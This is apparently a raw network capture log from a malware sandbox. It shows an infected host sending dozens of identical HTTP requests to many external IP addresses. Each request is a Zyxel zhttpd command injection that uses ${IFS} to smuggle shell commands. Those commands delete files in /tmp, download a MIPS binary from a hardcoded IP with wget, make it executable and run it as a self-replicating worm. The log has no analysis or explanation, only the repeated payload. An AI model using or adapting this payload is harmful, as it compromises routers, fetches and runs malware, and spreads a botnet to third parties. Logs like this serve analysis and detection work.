                                        Jan 14, 2024 16:18:40.349585056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3046192.168.2.1333564193.124.36.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349616051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3047192.168.2.1339562203.208.59.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349684000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3048192.168.2.1360564112.77.115.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349715948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3049192.168.2.1353552149.121.72.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349762917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3050192.168.2.135960077.97.157.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349811077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3051192.168.2.133629068.224.172.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349858046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3052192.168.2.1348304176.51.28.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349903107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3053192.168.2.1333980181.129.157.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349930048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3054192.168.2.1342084201.95.47.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.349967957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3055192.168.2.1353640141.216.250.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350013018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3056192.168.2.1335230208.170.184.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350055933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3057192.168.2.133985471.131.15.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350105047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3058192.168.2.1355980153.93.10.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350140095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3059192.168.2.134783281.84.99.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350164890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3060192.168.2.134540824.170.100.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350204945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3061192.168.2.1348006133.194.71.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350265026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3062192.168.2.133963895.38.36.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350313902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3063192.168.2.1352490164.84.42.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350353956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3064192.168.2.133291472.89.241.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350423098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3065192.168.2.1337184141.34.253.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350447893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3066192.168.2.135201424.168.44.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350486040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3067192.168.2.1333260102.28.77.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350534916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3068192.168.2.133754041.104.254.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350577116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3069192.168.2.133502485.9.106.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350630045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3070192.168.2.136022686.127.247.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350672007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3071192.168.2.134231614.140.6.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350677013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3072192.168.2.133291282.130.168.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350707054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3073192.168.2.13546041.246.28.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350780964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3074192.168.2.135900234.223.24.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350811958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3075192.168.2.135739237.195.225.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350857019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3076192.168.2.1360404128.242.15.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350888968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3077192.168.2.135948474.106.74.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350946903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3078192.168.2.133303469.131.34.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.350986004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3079192.168.2.1345358142.119.186.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351027012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3080192.168.2.135854288.190.140.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351044893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3081192.168.2.1337654207.85.171.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351099014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3082192.168.2.1339624131.146.247.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351150036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3083192.168.2.1351808164.0.101.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351187944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3084192.168.2.1333992181.80.195.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351211071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3085192.168.2.133963094.7.113.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351248980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3086192.168.2.135352865.48.33.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351284981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3087192.168.2.135612851.107.38.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351330042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3088192.168.2.1352430209.93.53.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351356030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3089192.168.2.134011861.87.143.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351386070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3090192.168.2.133762640.240.82.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351428986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3091192.168.2.135206486.203.59.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351494074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3092192.168.2.134203250.55.225.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351514101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3093192.168.2.134365279.180.207.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351564884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3094192.168.2.1337072211.149.79.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351603031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3095192.168.2.1335254199.67.201.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351656914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3096192.168.2.1338100182.190.55.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351701021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3097192.168.2.133800642.109.137.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351728916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3098192.168.2.134056451.162.97.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351787090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3099192.168.2.1359772140.76.36.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351825953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3100192.168.2.134647279.104.72.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351865053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3101192.168.2.133822461.146.174.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351890087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3102192.168.2.134387484.157.88.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351938963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3103192.168.2.134528090.54.13.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.351989031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3104192.168.2.1341530178.85.61.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352019072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3105192.168.2.133533654.82.7.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352041960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3106192.168.2.13328724.64.73.22443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352121115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3107192.168.2.1359024217.217.241.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.352153063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3108192.168.2.135078448.145.193.185443
                                        TimestampBytes transferredDirectionData
